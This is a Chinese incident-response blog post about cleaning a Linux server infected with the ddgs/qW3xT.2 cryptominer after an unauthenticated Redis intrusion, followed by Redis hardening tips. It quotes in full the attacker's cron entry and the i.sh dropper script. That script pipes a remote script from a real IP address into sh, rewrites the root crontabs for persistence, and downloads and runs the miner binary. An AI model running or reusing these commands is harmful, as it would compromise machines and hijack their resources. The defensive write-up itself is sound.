前言
隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經(jīng)成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個(gè)人電腦或服務(wù)器進(jìn)行挖礦,具體現(xiàn)象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風(fēng)扇噪聲增大等問(wèn)題。
本文主要介紹的是關(guān)于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說(shuō)了,來(lái)一起看看詳細(xì)的介紹吧
被入侵后的現(xiàn)象:
發(fā)現(xiàn)有qW3xT.2與ddgs兩個(gè)異常進(jìn)程,消耗了較高的cpu,kill掉后 過(guò)一會(huì)就會(huì)重新出現(xiàn)。
kill 掉這兩個(gè)異常進(jìn)程后,過(guò)一段時(shí)間看到了如下進(jìn)程:
首先在/etc/sysconfig/crotnab中的定時(shí)任務(wù)沒(méi)有找到定時(shí)腳本,輸入crontab -e 在其中找到了該定時(shí)任務(wù)
*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國(guó),i.sh 腳本內(nèi)容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013 if [ ! -f "/tmp/ddgs.3013" ]; then wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013 fi chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
處理方法:
1.刪除 crontab -e 中
*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
2.清除/root/.ssh/authorized_keys 中黑客設(shè)置的免密登錄內(nèi)容
3.修改redis密碼
4.修改root與登錄賬戶密碼
安全建議:
1.配置bind選項(xiàng),限定可以連接Redis服務(wù)器的IP,修改 Redis 的默認(rèn)端口6379 配置認(rèn)證,也就是AUTH,設(shè)置密碼,密碼會(huì)以明文方式保存在Redis配置文件中
2.配置rename-command 配置項(xiàng) “RENAME_CONFIG”,這樣即使存在未授權(quán)訪問(wèn),也能夠給攻擊者使用config 指令加大難度
3.如果可以在防火墻中屏蔽redis外網(wǎng)
入侵方式:
收集了相關(guān)資料,了解到其是利用redis漏洞,未設(shè)置密碼或密碼太簡(jiǎn)單,導(dǎo)致的被入侵。具體方式可以參考
https://www.jb51.net/article/147375.htm
reids修改密碼方法如下:
redis-cli -h 127.0.0.1 -p 6379 config get requirepass ##獲取當(dāng)前密碼 config set requirepass "yourpassword" ##設(shè)置當(dāng)前密碼,服務(wù)重新啟動(dòng)后又會(huì)置為默認(rèn),即無(wú)密碼;
永久生效方法為,打開redis配置文件redis.conf,找到requirepass值修改密碼,如下:
requirepass yourpassword ##此處注意,行前不能有空格
總結(jié)
以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)腳本之家的支持。
標(biāo)簽:岳陽(yáng) 股票 四川 鎮(zhèn)江 烏海 臨沂 紅河
巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《linux服務(wù)器被植入ddgs、qW3xT.2挖礦病毒的處理實(shí)戰(zhàn)記錄》,本文關(guān)鍵詞 linux,服務(wù)器,被,植入,ddgs,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。